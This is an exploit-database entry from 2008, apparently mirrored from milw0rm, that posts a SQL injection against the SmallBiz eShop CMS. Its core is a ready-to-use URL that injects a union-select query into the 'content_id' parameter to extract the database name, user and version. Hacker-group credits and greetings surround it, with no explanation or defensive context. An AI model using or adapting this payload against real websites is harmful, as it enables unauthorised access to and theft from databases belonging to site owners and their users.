SmallBiz eShop - 'content_id' SQL Injection



EKU-ID: 13384 CVE: OSVDB-ID:
Author: Stack Published: 2008-04-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


###################################################
[~] Powered by SmallBiz eShop CMS Remote Sql İnj. Vuln.

[~] Founder: Stack-Terrorist [v40] [ Moroc00 Hacker ]
[~] HomePage: http://www.v4-team.com
[~] Greatz : To all Hackerz from Moroc00 & All My Friends . . .
[~] Contact: admin@v4-team.com
[~] Exploit :
http://www.xxx.co.il/index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-14]